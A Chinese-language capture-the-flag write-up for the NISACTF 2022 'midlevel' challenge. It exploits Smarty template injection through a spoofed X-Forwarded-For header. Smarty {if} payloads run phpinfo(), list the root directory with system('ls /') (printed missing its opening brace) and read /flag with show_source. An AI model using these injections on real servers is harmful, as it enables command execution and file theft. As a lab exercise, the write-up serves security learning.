[NISACTF 2022]midlevel

NISACTF 2022midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :

最下面提示:Build With Smarty ! :

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

复制代码
{if phpinfo()}{/if}

返回结果:

查看根目录下所有文件:

复制代码
if system('ls /')}{/if}

返回结果:

发现 flag 。

读取 flag 文件:

复制代码
{if show_source('/flag')}{/if}

返回结果:

拿到 flag 。

相关推荐
whcyhhh2 小时前
CTF‑MISC 隐写术完整学习笔记|图片隐写全题型 + 工具 + 实战例题
python·网络安全·ctf·misc·信息隐藏
其实防守也摸鱼2 小时前
推荐一个自动化教育SRC漏洞挖掘系统--AutoHunter
运维·开发语言·人工智能·学习·安全·web安全·自动化
三垣网安18 小时前
记一次渗透测试 | 教育src漏洞分享(2)
网络·安全·web安全·网络安全
汽车网络安全爱好者19 小时前
AUTOSAR SecOC 深入解析(一):从 Freshness Value 到 MAC 认证的完整流
物联网·网络安全·汽车·密码学
菩提小狗20 小时前
每日安全情报报告 · 2026-08-23
网络安全·漏洞·cve·安全情报·每日安全
Sagittarius_A*20 小时前
【好靶场】PHP反序列化绕过
web安全·信息安全·php·代码审计·反序列化绕过
大方子1 天前
【PolarCTF】ezjava
网络安全·polarctf
网安蟹佬霸1 天前
SSRF服务端请求伪造攻防实战:从内网穿透到云元数据利用
sql·web安全·网络安全·自动化·网安
白猫不黑1 天前
AI Agent自动化渗透测试实战:从原理到红队实践
运维·人工智能·web安全·网络安全·信息安全·渗透测试·自动化
Rain的Java大神之路1 天前
短信接口被狂刷怎么处理
java·运维·后端·web安全·面试·架构·xss